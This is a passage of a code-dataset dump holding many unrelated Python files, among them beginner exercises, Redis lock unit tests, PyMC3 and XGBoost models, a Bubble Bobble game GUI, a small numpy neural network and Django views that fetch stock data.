Example Output 1:\n\n# ['⬜️', '⬜️', '⬜️']\n\n# ['⬜️', '⬜️', '⬜️']\n\n# ['⬜️', 'X', '⬜️']\n\n# Example Input 2: column 3, row 1 would be entered as: 31\n\n# Example Output 2:\n\n# ['⬜️', '⬜️', 'X']\n\n# ['⬜️', '⬜️', '⬜️']\n\n# ['⬜️', '⬜️', '⬜️']\n\n\n# # Hint\n\n# 1. Remember that Lists start at index 0!\n# 2. ```map``` is just a variable that contains a nested list. It's not related to the map function in Python.\n\n# 🚨 Don't change the code below 👇\n# 1 2 3 COLUMNS\nrow1 = [\"⬜️\",\"⬜️\",\"⬜️\"] # 1 R\nrow2 = [\"⬜️\",\"⬜️\",\"⬜️\"] # 2 O\nrow3 = [\"⬜️\",\"⬜️\",\"⬜️\"] # 3 WS\nmap = [row1, row2, row3]\nprint(f\"{row1}\\n{row2}\\n{row3}\")\nposition = input(\"Where do you want to put the treasure? 
\")\n# 🚨 Don't change the code above 👆\n#Write your code below this row 👇\n\n# rows first column last/next\n# If the input given is 23 it will move 2 rows 3 columns\n\nx_position = int(position[0]) #2 since they are still strings we'll change them to intergers -> int()\ny_position = int(position[1]) #3\n\n# On row 2 rows and column 3 put X\nmap[x_position - 1][y_position - 1] = \"X\"\n\n#Write your code above this row 👆\n\n# 🚨 Don't change the code below 👇\nprint(f\"{row1}\\n{row2}\\n{row3}\")\n","sub_path":"Day 4/day-4-3-treasure-map.py","file_name":"day-4-3-treasure-map.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"254722769","text":"import maya.cmds as cmds\nimport os\nimport random\nimport math\n\n\nclass AR_poly(object):\n use = None\n\n def showUI(cls, uifile):\n win = cls(uifile)\n win.create()\n return win\n\n def __init__(self, filepath):\n AR_poly.use = self\n self.window = '0000'\n self.uifile = filepath\n\n def create(self):\n if cmds.window(self.window, exists=True):\n cmds.deleteUI(self.window)\n\n self.window = cmds.loadUI(uiFile=self.uifile, verbose=True)\n cmds.showWindow(self.window)\n\n\nclass tplink(object):\n use = None\n\n def __init__(self, pname, long, shipname='ship'):\n\n self.pname = pname\n self.long = long\n\n\n #self.abgle = abgle\n self.name = shipname\n self.eel = []\n self.vortname = 'vortX'\n tplink.use = self\n\n\n\n def create(self, *args):\n agle = None\n try:\n path = '|'.join(['box','getagle'])\n agle = float(cmds.textField(path,q=True,text=True))\n except:raise\n\n abgle = (math.pi / 180) * agle\n\n\n self.kkk =int( 180/agle)\n\n high = None\n try :\n high_path = '|'.join(['box','gethigh'])\n high = float(cmds.textField(high_path,q = True,text = True))\n except : raise\n\n\n\n pnumber = None\n try:\n pnumber_path = '|'.join(['box','getpnumber'])\n pnumber = int(cmds.textField(pnumber_path,q=True,text = True))\n except:raise\n\n\n for i in range(pnumber):\n self.eel.append((random.uniform(-1, 1), random.uniform(-1*high, high), random.uniform(-1 * self.long, self.long)))\n for i in range(self.kkk):\n for i in range(pnumber):\n cos = math.cos(abgle * i)\n sin = math.sin(abgle * i)\n self.eel.append((self.eel[i][0] * cos + self.eel[i][2] * sin, self.eel[i][1],\n self.eel[i][2] * cos - self.eel[i][0] * sin))\n\n cmds.particle(jbp=self.eel, n=self.name, c=1)\n\n cmds.setAttr(\"%sShape.particleRenderType\" % self.name, 4)\n\n\n\n\n\n\n\n def link(self, *args):\n cmds.vortex(n=self.vortname, pos=(0, 0, 0), m=5, ay=1, att=1, mxd=-1, vsw=360, tsr=0.5)\n\n cmds.connectAttr('%s.outputForce[0]' % self.vortname, '%sShape.inputForce[0]' % self.name)\n cmds.connectAttr('%sShape.fieldData' % self.name, '%s.inputData[0]' % self.vortname)\n cmds.connectAttr('%sShape.ppFieldData[0]' % self.name, '%s.inputPPData[0]' % self.vortname)\nopcc = tplink( pname='fut', long=20)\nwin = AR_poly(os.path.join(os.getenv('HOME'), 'poly.ui'))\nwin.create()\n","sub_path":"Nebula.py","file_name":"Nebula.py","file_ext":"py","file_size_in_byte":2614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"97217742","text":"# -*- coding: utf-8 -*-\r\n\r\nimport re \r\npattern = r'\\d+'\r\nwith open (\"len4.txt\") as f:\r\n file = f.read();\r\n\r\neach_first = file.split(\"\\n\")[:-1]\r\n\r\n\r\nfor i in range(0,len(each_first)):\r\n if each_first[i]== '*':\r\n each_first[i]= '0M0'\r\n\r\nif (len(each_first)%2 != 0) :\r\n 
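    # pad with the '0M0' placeholder so the extracted values can be summed in pairs below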
each_first.append('0M0')\r\n \r\ntotal =[] \r\n\r\nfor i in range(0,len(each_first)):\r\n string = str(each_first[i])\r\n each = re.findall(pattern,string)\r\n for j in range(len(each)):\r\n if each[j]=='':\r\n each[j]=0\r\n total.append(each[j]) \r\nsummary = []\r\nfor i in range(0,len(total),2):\r\n first = int(total[i])\r\n second = int (total[i+1])\r\n sum = first + second\r\n summary.append(sum)\r\n\r\n\r\nMax_value = max(summary)\r\nprint (Max_value)\r\n\r\n\r\n","sub_path":"Find_coverage/find_length.py","file_name":"find_length.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"14963995","text":"# Copyright 2016 Internap\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport threading\nfrom time import sleep\nimport unittest\nimport fakeredis\n\nfrom mock import patch\nfrom redlock import Redlock, Lock\nfrom redlock_fifo.extensible_redlock import ExtensibleRedlock\n\nfrom testutils import FakeRedisCustom, get_servers_pool\n\n\nclass ExtensibleRedlockTest(unittest.TestCase):\n\n @patch('redis.StrictRedis', new=FakeRedisCustom)\n def setUp(self):\n self.redlock = ExtensibleRedlock(get_servers_pool(active=1, inactive=0))\n self.redlock_with_51_servers_up_49_down = Redlock(get_servers_pool(active=51, inactive=49))\n self.redlock_with_50_servers_up_50_down = Redlock(get_servers_pool(active=50, inactive=50))\n\n def tearDown(self):\n fakeredis.DATABASES = {}\n\n def test_bad_connection_info(self):\n with self.assertRaises(Warning):\n Redlock([{\"cat\": \"hog\"}])\n\n def test_should_be_able_to_lock_a_resource_after_it_has_been_unlocked(self):\n lock = self.redlock.lock(\"shorts\", 10)\n self.assertIsInstance(lock, Lock)\n self.redlock.unlock(lock)\n lock = self.redlock.lock(\"shorts\", 10)\n self.assertIsInstance(lock, Lock)\n\n def test_safety_property_mutual_exclusion(self):\n \"\"\"\n At any given moment, only one client can hold a lock.\n \"\"\"\n lock = self.redlock.lock(\"shorts\", 100000)\n self.assertIsInstance(lock, Lock)\n bad = self.redlock.lock(\"shorts\", 10)\n self.assertFalse(bad)\n\n def test_liveness_property_A_deadlocks_free(self):\n \"\"\"\n Eventually it is always possible to acquire a lock,\n even if the client that locked a resource crashed or gets partitioned.\n \"\"\"\n lock_A = self.redlock_with_51_servers_up_49_down.lock(\"shorts\", 500)\n self.assertIsInstance(lock_A, Lock)\n sleep(1)\n lock_B = self.redlock_with_51_servers_up_49_down.lock(\"shorts\", 1000)\n self.assertIsInstance(lock_B, Lock)\n\n def test_liveness_property_B_fault_tolerance(self):\n \"\"\"\n As long as the majority of Redis nodes are up, clients are able to acquire and release locks.\n \"\"\"\n lock_with_majority = self.redlock_with_51_servers_up_49_down.lock(\"shorts\", 100000)\n self.assertIsInstance(lock_with_majority, Lock)\n\n lock_without_majority = self.redlock_with_50_servers_up_50_down.lock(\"shorts\", 100000)\n self.assertEqual(lock_without_majority, False)\n\n def 
test_locks_are_released_when_majority_is_not_reached(self):\n \"\"\"\n [...] clients that fail to acquire the majority of locks,\n to release the (partially) acquired locks ASAP [...]\n \"\"\"\n lock = self.redlock_with_50_servers_up_50_down.lock(\"shorts\", 10000)\n self.assertEqual(lock, False)\n\n for server in self.redlock_with_50_servers_up_50_down.servers:\n self.assertEqual(server.get('shorts'), None)\n\n def test_avoid_removing_locks_created_by_other_clients(self):\n \"\"\"\n [...] avoid removing a lock that was created by another client.\n \"\"\"\n lock_A = self.redlock.lock(\"shorts\", 100000)\n self.assertIsInstance(lock_A, Lock)\n\n lock_B = Lock(validity=9000, resource='shorts', key='abcde')\n self.redlock.unlock(lock_B)\n\n for server in self.redlock.servers:\n self.assertEqual(server.get('shorts'), lock_A.key)\n\n def test_two_at_the_same_time_only_one_gets_it(self):\n threads = []\n threads_that_got_the_lock = []\n\n def get_lock_and_register(thread_name, redlock, resource, output):\n lock = redlock.lock(resource, 100000)\n if lock:\n output.append(thread_name)\n\n for i in range(2):\n thread = threading.Thread(\n target=get_lock_and_register, args=(i, self.redlock, 'shorts', threads_that_got_the_lock)\n )\n thread.start()\n threads.append(thread)\n\n for t in threads:\n t.join()\n\n self.assertEqual(len(threads_that_got_the_lock), 1)\n\n def test_a_lock_can_be_extended(self):\n lock = self.redlock.lock(\"shorts\", 500)\n self.redlock.extend(lock, 1000)\n sleep(0.6)\n for server in self.redlock.servers:\n self.assertEqual(server.get('shorts'), lock.key)\n\n\n","sub_path":"tests/test_extensible_redlock.py","file_name":"test_extensible_redlock.py","file_ext":"py","file_size_in_byte":4862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"119391268","text":"import pymc3 as pm\nimport numpy as np\nimport scipy.stats as stats\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport pandas as pd\nimport theano.tensor as T\n\n# from pymc3 import get_data\n\nnp.set_printoptions(precision=0, suppress=True)\n# 2017.11.11编辑\n# ======================================================================\n# 数据导入\n# ======================================================================\ndag_data = np.genfromtxt(\"E:/Code/Bayescode/QW_reliable/First_model/XZsingal.csv\",\n skip_header=1, usecols=[1, 2, 3, 4, 5, 6, 7, 8], delimiter=\",\")\nelec_data = pd.read_csv('XZsingal.csv')\n\n# 计算同一公司产品测试地点数目\ncompanies_num = elec_data.counts.unique()\ncompanies = len(companies_num) # companies=7, 共7个测试地点\ncompany_lookup = dict(zip(companies_num, range(len(companies_num))))\ncompany = elec_data['company_code'] = elec_data.counts.replace(company_lookup).values # 加一行数据在XZsingal文件中\n# companys = elec_data.counts.values - 1 # 这一句以上面两行功能相同\n\n# elec_count = elec_data.counts.values\n\nelec_year = elec_data.Year.values # 观测时间值X1\nelec_year1 = (elec_year-np.mean(elec_year))/np.std(elec_year)\nelec_tem = elec_data.Tem.values # 观测温度值X2\nelec_tem1 = (elec_tem-np.mean(elec_tem))/np.std(elec_tem)\n# 计算故障率大小:故障数目/总测量数,作为模型Y值,放大1000倍以增加实际效果,结果中要缩小1000倍\n# elec_fault = elec_data.Fault / elec_data.Nums\nelec_faults = 1000*(elec_data.Fault.values / elec_data.Nums.values) # 数组形式\nelec_faults1 = (elec_faults-np.mean(elec_faults))/np.std(elec_faults)\n\n# ======================================================================\n# 模型建立:\n# 模型1:using pymc3 GLM自建立模型,Normal分布更优\n# 模型2: 自己模型\n# ======================================================================\ndata = 
dict(x=elec_year, z1=elec_tem, y=elec_faults)\n\nwith pm.Model() as mdl_ols_glm:\n # family = pm.glm.families.StudentT()\n pm.glm.GLM.from_formula('y ~ 1+x + z1', data, family=pm.glm.families.Normal())\n # pm.glm.GLM.from_formula('y ~ 1 + x + z1', data, family=family)\n\n traces_ols_glm = pm.sample(3000)\npm.traceplot(traces_ols_glm)\nplt.show()\n\n\nwith pm.Model() as pooled_model:\n # define priors\n sigma = pm.HalfCauchy('sigma', 5)\n beta = pm.Normal('beta', 0, 1000)\n beta1 = pm.Normal('beta1', 0, 10000)\n beta2 = pm.Normal('beta2', 0, 1000)\n\n # define likelihood 建立与时间相关的函数\n # out_pai = pm.Deterministic('out_pai',)\n theta = beta + beta1*elec_year + beta2*elec_tem1\n Observed = pm.Normal(\"Observed\", theta, sd=sigma, observed=elec_faults1) # 观测值\n\n # start = pm.find_MAP()\n # step = pm.Metropolis()\n trace1 = pm.sample(4000, tune=1000)\nchain1 = trace1\nvarnames1 = ['sigma', 'beta', 'beta1', 'beta2']\npm.traceplot(chain1, varnames1)\nplt.show()\n'''\n# ======================================================================\n# unpooled_model\n# ======================================================================\nwith pm.Model() as unpooled_model:\n # define priors\n sigma = pm.HalfCauchy('sigma', 5)\n\n beta = pm.Normal('beta', 0, 1000, shape=companies)\n beta1 = pm.Normal('beta1', 0, 10000, shape=companies)\n beta2 = pm.Normal('beta2', 0, 1000)\n\n # define likelihood 建立与时间相关的函数\n theta = beta[company] + beta1[company]*elec_year + beta2*elec_tem1\n\n Observed = pm.Normal(\"Observed\", theta, sd=sigma, observed=elec_faults1) # 观测值\n\n # start = pm.find_MAP()\n # step = pm.Metropolis()\n trace2 = pm.sample(4000, tune=500)\nchain2 = trace2\nvarnames2 = ['sigma', 'beta', 'beta1', 'beta2']\npm.traceplot(chain2, varnames2)\nplt.show()\n\n# 画出自相关曲线\npm.autocorrplot(chain2)\nplt.show()\n\nprint(pm.dic(trace2, unpooled_model))\n'''\n# ======================================================================\n# partial_model\n# ======================================================================\nwith pm.Model() as partial_model:\n # define priors\n mu_a = pm.Normal('mu_a', mu=0., tau=0.0001)\n sigma_a = pm.HalfCauchy('sigma_a', beta=100)\n\n beta = pm.Normal('beta', 0, 100, shape=companies)\n beta1 = pm.Normal('beta1', mu=mu_a, sd=sigma_a)\n beta2 = pm.Normal('beta2', 0, 100)\n\n sigma = pm.HalfCauchy('sigma', 5) # Model error\n # define likelihood 建立与时间相关的函数\n # out_pai = pm.Deterministic('out_pai',)\n # theta = pm.Deterministic('theta', beta + beta1*elec_year + beta2*elec_tem1)\n theta = beta[company] + beta1 * elec_year + beta2 * elec_tem1\n\n Observed = pm.Normal(\"Observed\", theta, sd=sigma, observed=elec_faults1) # 观测值\n\n start = pm.find_MAP()\n step = pm.Metropolis()\n trace3 = pm.sample(5000, step=step, start=start, tune=1000)\nchain3 = trace3\nvarnames3 = ['mu_a', 'sigma_a', 'beta', 'beta1', 'beta2']\nvarnames4 = ['sigma']\npm.traceplot(chain3, varnames3)\nplt.show()\nplt.savefig('5partial_model.png', dpi=300, figsize=[14, 15])\npm.traceplot(chain3, varnames4)\nplt.show()\n# 画出自相关曲线\npm.autocorrplot(chain3)\nplt.show()\n\n# plt.figure(figsize=(6, 14))\n# pm.forestplot(chain3, varnames=['beta'])\n# plt.show()\n\nprint(pm.dic(trace3, partial_model))\n\n# ======================================================================\n# 模型对比\n# ======================================================================\nWaic = pm.compare([traces_ols_glm, trace1, trace3], [mdl_ols_glm, pooled_model, partial_model], ic='WAIC')\n# Waic = pm.compare([traces_ols_glm, trace1, trace2, trace3], 
[mdl_ols_glm, pooled_model, unpooled_model, partial_model], ic='WAIC')\nprint(Waic)\n\n\n\n# # 画出A公司的产品曲线\n# sig0 = pm.hpd(trace['theta'], alpha=0.6)[0]\n#\n# plt.figure()\n# ax = sns.distplot(sig0)\n\n\n\n","sub_path":"First_model/5Fifth.py","file_name":"5Fifth.py","file_ext":"py","file_size_in_byte":5827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"154537840","text":"nouns={0:\"cat\",1:\"dog\",2:\"human\",3:\"whale\",4:\"dolphin\",5:\"pigeon\",6:\"eagle\",7:\"mammal\",8:\"bird\",9:\"animal\"}\nadj=[[0 for i in range(10)] for j in range(10)]\n\n\nadj[0][7]=1\nadj[1][7]=1\nadj[2][7]=1\nadj[3][7]=1\nadj[4][7]=1\nadj[5][8]=1\nadj[6][8]=1\nadj[7][9]=1\nadj[8][9]=1\n\n\n\ndef dfs(v):\n print(nouns[v])\n vis[v]=1\n for i in range(10):\n if adj[v][i] and not vis[i]:\n dfs(i)\nprint(\"Implementation of 'is a' relation\\n\")\nfor i in range(7):\n print(f\"Relation {i+1}\")\n vis=[0 for i in range(10)]\n if vis[i]==0:\n vis[i]=1\n dfs(i)","sub_path":"EXP_8/EXP8.py","file_name":"EXP8.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"252788217","text":"class Solution:\n def uniqueOccurrences(self, arr: List[int]) -> bool:\n count = {}\n for i in range(len(arr)):\n if arr[i] in count:\n count[arr[i]] += 1\n else:\n count[arr[i]] = 1\n\n occurence_count = set()\n for c in count.values():\n if c in occurence_count:\n return False\n else:\n occurence_count.add(c)\n\n return True\n\n","sub_path":"BootCamp/CD1/UniqueNumberOfOccurences.py","file_name":"UniqueNumberOfOccurences.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"587794269","text":"# -*- coding: utf-8 -*-\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.datasets import load_wine\nfrom sklearn.metrics import mean_squared_error, confusion_matrix, classification_report\nfrom sklearn.model_selection import train_test_split\n\nimport xgboost as xgb\n \nwine = load_wine()\n\nX = wine.data\ny = wine.target\n\nX_train, X_test, y_train, y_test = \\\ntrain_test_split(X, y, test_size=0.3, random_state=42)\n\n# 다항 분류를 위한 XGBClassifier 객체를 생성\n# objective 하이퍼 파라메터의 값을 multi:softmax or multi:softprob 으로 설정\nmodel = xgb.XGBClassifier(objective=\"multi:softprob\", \n n_estimators=1000,\n subsample=0.7,\n random_state=42)\nmodel.fit(X_train, y_train)\n\nprint(\"학습 결과 : \", model.score(X_train, y_train))\nprint(\"테스트 결과 : \", model.score(X_test, y_test))\n\ny_pred = model.predict(X_train)\nprint(\"confusion_matrix - 학습 데이터\")\nprint(confusion_matrix(y_train, y_pred))\n\ny_pred = model.predict(X_test)\nprint(\"confusion_matrix - 테스트 데이터\")\nprint(confusion_matrix(y_test, y_pred))\nprint(classification_report(y_test, y_pred))\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"2_scikit-learn/4_ensemble/5_xgboost/xgboost_04_Multiclass_Classifier.py","file_name":"xgboost_04_Multiclass_Classifier.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"145688381","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Nov 22 18:53:09 2015\n\n@author: lifeng\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport itertools as it\nimport Rough\nimport datetime\n\n\ndef iscontain(p_B,p_D):\n part=set(range(len(p_B)))\n for i in range(len(p_B)):\n for j in range(len(p_D)):\n if p_B[i]<= p_D[j]:\n part=part-{i}\n return 
len(part)==0 \n\ndef partition(sys,att):\n\tgroup=sys.groupby(att)\n\tpart=[set(group.get_group(item).index) for item in group.indices]\n\treturn part\n\ndef aweakb(a,b):\n n = len(a)\n count = 0\n for i in range(n):\n count += (b[i]>=a[i])\n if count == n:\n return 1\n else:\n return 0\n \n \ndef DeleteAdd(element,collection):\n new = collection[:]\n for item in collection:\n if aweakb(element,item):\n return new\n break\n if aweakb(item,element):\n new.remove(item)\n new.append(element) \n return new\n \n\n#######################\ndata=pd.read_csv(\"C:\\\\Users\\\\lifeng\\\\Desktop\\\\paper_two\\\\sig_test\\\\UCISets\\\\wine_multi_data2.csv\",index_col='id')\n\nA=list(data.columns) \nAT=A[0:len(A)-1]\nD=A[len(A)-1]\nC = [1]*len(level)\nfor i in range(1,len(C)):\n C[i] = C[i-1]+ level[i-1] \nB=[A[i-1] for i in C]\n\n\np_B= Rough.partition(data,B)\np_D= Rough.partition(data,D)\npos= Rough.positive(p_B,p_D)\n\nscale = [0]+level\nnames = locals()\nA_list = []\nfor i in range(1,len(scale)):\n names['A%d'%i] = range(sum(scale[:i]),sum(scale[:i+1]))\n A_list.append(names['A%d'%i])\n\ncand=iter(it.product(*A_list))\n\nlst = [sum(scale[:i])-1 for i in range(1,len(scale))]\n\n\n\nNN = 1\nfor j in level:\n NN*=j\n \n\n\nstarttime = datetime.datetime.now()\nfirst = list(cand.next())\ns = [list(np.array(first)-np.array(lst))]\ni=0\n\nwhile i>> Escriba su codigo a partir de este punto <<<\n##\nimport itertools\ndatos = open('data.csv','r').readlines()\ndatos = [d.split('\\t') for d in datos]\nmes = [d[2].split('-')[1] for d in datos]\n[print(key,len(list(group)),sep=',') for key,group in itertools.groupby(sorted(mes))]","sub_path":"03-python=1/q04=1/question.py","file_name":"question.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"310492512","text":"import g2d_pyg as g2d\nfrom random import randint, choice\nfrom boardgame_bubble_bobble import BubbleGame, Bubble\n\n# variabili globali\nCONT_STEP = 0 # contatore per i passi che deve compiere il nemico prima di cambiare direzione\nDECISION = randint(1,3) # scelte per i possibili movimenti del nemico\nDIRECTION = 0 # stabilisce la direzione della bolla in base alla direzione assunta dal drago\nSPEED = 5\nSTEP_DIR_FRAME = 15 # numero di frame prima che il nemico cambi la sua direzione (fatto per avere un movimento più semplice e lineare)\n\nclass BubbleGui:\n def __init__(self):\n self._game = BubbleGame()\n g2d.init_canvas(self._game.arena().size())\n self._sprites = g2d.load_image(\"bubble_bobble.png\")\n # self._sprites = g2d.load_image(\"https://tomamic.github.io/images/sprites/bubble-bobble.png\")\n g2d.main_loop(self.tick)\n\n\n def tick(self):\n global CONT_STEP, DECISION, DIRECTION\n\n # controlli da tastiera separati per ogni giocatore e con gestione della direzione per la bolla. 
A destra ←→↑↓ ; a sinistra WASD\n if g2d.key_pressed(\"ArrowUp\"):\n self._game.hero1().go_up()\n elif g2d.key_pressed(\"ArrowRight\"):\n self._game.hero1().go_right()\n DIRECTION = 1\n elif g2d.key_pressed(\"ArrowLeft\"):\n self._game.hero1().go_left()\n DIRECTION = 0\n elif (g2d.key_released(\"ArrowLeft\") or g2d.key_released(\"ArrowRight\")):\n self._game.hero1().stay()\n elif g2d.key_pressed(\"ArrowDown\"):\n dragon_x, dragon_y, dragon_w, dragon_h = self._game.hero1().position()\n if DIRECTION == 0:\n dragon_dimension = dragon_x - dragon_w\n speed = -SPEED\n elif DIRECTION == 1:\n dragon_dimension = dragon_x + dragon_w\n speed = SPEED\n self._game.bubble().append(Bubble(self._game.arena(), (dragon_dimension, dragon_y), speed))\n\n if g2d.key_pressed('w'):\n self._game.hero().go_up()\n elif g2d.key_pressed(\"d\"):\n self._game.hero().go_right()\n DIRECTION = 1\n elif g2d.key_pressed(\"a\"):\n self._game.hero().go_left()\n DIRECTION = 0\n elif (g2d.key_released(\"a\") or g2d.key_released(\"d\")):\n self._game.hero().stay()\n elif g2d.key_pressed(\"s\"):\n dragon_x, dragon_y, dragon_w, dragon_h = self._game.hero().position()\n if DIRECTION == 0:\n dragon_dimension = dragon_x - dragon_w\n speed = -SPEED\n elif DIRECTION == 1:\n dragon_dimension = dragon_x + dragon_w\n speed = SPEED\n self._game.bubble().append(Bubble(self._game.arena(), (dragon_dimension, dragon_y), speed))\n \n # decisione del movimento per il nemico aggiornando il numero di passi con il tick\n CONT_STEP += 1\n if CONT_STEP == STEP_DIR_FRAME:\n for enemy in self._game.enemy():\n DECISION = randint(1,3)\n enemy.decision(DECISION)\n CONT_STEP = 0\n else:\n for enemy in self._game.enemy():\n enemy.decision(DECISION)\n\n # controllo se il giocatore è vivo e nel caso lo rimuov0 e lo riaggiungo nel punto di origine\n if self._game.hero().lives() == 0:\n self._game.arena().remove(self._game.hero())\n g2d.alert(\"Sei stato eliminato!\")\n self._game.hero().restore()\n\n if self._game.hero1().lives() == 0:\n self._game.arena().remove(self._game.hero1())\n g2d.alert(\"Sei stato eliminato!\")\n self._game.hero1().restore()\n \n self._game.arena().move_all() # Game logic\n \n # disegno degli elementi grafici\n g2d.clear_canvas()\n\n for i in self._game.platform():\n i.fill()\n\n for a in self._game.arena().actors():\n if a.symbol() != (0, 0, 0, 0):\n g2d.draw_image_clip(self._sprites, a.symbol(), a.position())\n else:\n g2d.fill_rect(a.position())\n\n # gestione delle vite, dei punti e del tempo nell'interfaccia\n lives_player = \"Player1 Lives: \" + str(self._game.hero().lives())\n lives_player1 = \"Player2 Lives: \" + str(self._game.hero1().lives())\n points = \"Points: \" + str(self._game.hero().points() + self._game.hero1().points())\n toplay = \"Time: \" + str(self._game.remaining_time())\n\n g2d.draw_text(lives_player + \" \" + toplay + \" \" + points, (0, 0), 24)\n g2d.draw_text(lives_player1, (0,24), 24)\n\n # creazione degli alert per il termine del gioco\n if self._game.game_over():\n g2d.alert(\"Game over\")\n g2d.close_canvas()\n\n elif self._game.game_won():\n g2d.alert(\"Game won\")\n g2d.close_canvas()\n\ngui = BubbleGui()","sub_path":"boardgui_bubble_bobble.py","file_name":"boardgui_bubble_bobble.py","file_ext":"py","file_size_in_byte":4990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"57154114","text":"'''\npython = 2\nnumpy\n'''\nfrom numpy import exp, array, random, dot\n\n\nclass NeuralNerwork():\n def __init__(self):\n random.seed(1)\n self.weights = 2 * 
random.random((3,1)) - 1\n\n def __sigmoid(self, x):\n return 1 / (1 + exp(-x))\n\n def __sigmoid_derivative(self, x):\n return x * (1 - x)\n\n def train(self, training_input, training_output, iterations):\n for inter in xrange(iterations):\n output = self.predict(training_input)\n error = training_output - output\n #meaning of here?\n adjustments = dot(training_input.T, error * self.__sigmoid_derivative(output))\n self.weights += adjustments\n\n def predict(self, inputs):\n return self.__sigmoid(dot(inputs, self.weights))\n\ndef dataset():\n i = array([[0, 0, 1],[1, 1, 1],[1, 0, 1],[0, 1, 1]])\n o = array([[0, 1, 1, 0]]).T\n return i, o\n\nif __name__ == \"__main__\":\n #prepare dataset\n training_set_inputs, training_set_outputs = dataset()\n print (training_set_inputs)\n print (\"----------------------------------------------------\")\n print (training_set_outputs)\n print (\"----------------------------------------------------\")\n #initialise neural network\n nn = NeuralNerwork()\n\n #train the neural network\n nn.train(training_set_inputs, training_set_outputs, 10000)\n\n print (\"New weights:\")\n print (\"----------------------------------------------------\")\n print (nn.weights)\n print (\"----------------------------------------------------\")\n\n #test the model\n print ((\"[1, 0, 0]:\"))\n print (\"----------------------------------------------------\")\n print (nn.predict(array([1, 0, 0])))\n","sub_path":"neural_network/siraj_nn/siraj_nn.py","file_name":"siraj_nn.py","file_ext":"py","file_size_in_byte":1692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"129767111","text":"\"\"\"hypercar URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.urls import path\nfrom tickets.views import WelcomePageView, MenuPageView, TicketPageView, ProcessingPageView, NextTicketView\n\nurlpatterns = [\n # path('admin/', admin.site.urls),\n path('welcome/', WelcomePageView.as_view()),\n path('menu/', MenuPageView.as_view()),\n path('get_ticket/', TicketPageView.as_view()),\n path('processing', ProcessingPageView.as_view()),\n path('next', NextTicketView.as_view())\n]\n","sub_path":"hypercar/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"131329327","text":"from django.shortcuts import render,render_to_response\nfrom django.template import RequestContext\nfrom django.template.context_processors import csrf\nfrom django.http import HttpResponse\n\n\nimport tushare as ts\nimport pandas as pd\nimport numpy as np\nimport os\nimport pickle\nimport matplotlib.pyplot as plt\n\neps = {'2010':0,'2011':0,'2012':0,'2013':0,'2014':0,'2015':0,'2016':0,'2017':0,}\n\n\ndef get_eps(code):\n for i in range(2010,2017):\n if os.path.exists('/home/wk/wkfile/data'+str(i)+'.pkl'):\n with open('/home/wk/wkfile/data'+str(i)+'.pkl','rb') as f:\n data = pickle.load(f)\n else:\n data = ts.get_report_data(i,4)\n with open('/home/wk/wkfile/data'+str(i)+'.pkl','wb') as f:\n pickle.dump(data,f)\n if str(i) in eps.keys():\n eps[str(i)] = data[ data['code'] == code ].iloc[0,2] \n return eps\n\ndef get_price(code):\n return ts.get_k_data(code,start='2011-01-01',end='2017-12-29')\n\ndef calculate_pe(eps,Price):\n pe = pd.Series(0,Price.date)\n for i in Price.date:\n year_now = i.split('-')[0]\n year_before = str(int(year_now)-1)\n pe.at[i] = (Price[Price.date == i].close)/(eps[year_before])\n return pe\n\ndef get_pe():\n eps = get_eps('600519')\n Price = get_price('600519')\n pe = calculate_pe(eps,Price)\n return pe\n\ndef get_pe_data(request):\n pe = get_pe()\n stock_pe=[]\n for i in pe:\n stock_pe.append(i)\n stock_pe.append('*')\n return HttpResponse(stock_pe)\n\ndef get_pe_date(request):\n pe = get_pe()\n stock_date=[]\n for i in pe.index:\n stock_date.append(i)\n stock_date.append('*')\n return HttpResponse(stock_date)\n\ndef index(request):\n return render(request,'myapp/index.html')\n#def index(request):\n# return render_to_response('myapp/index.html', context=csrf(request))\n\n# Create your views 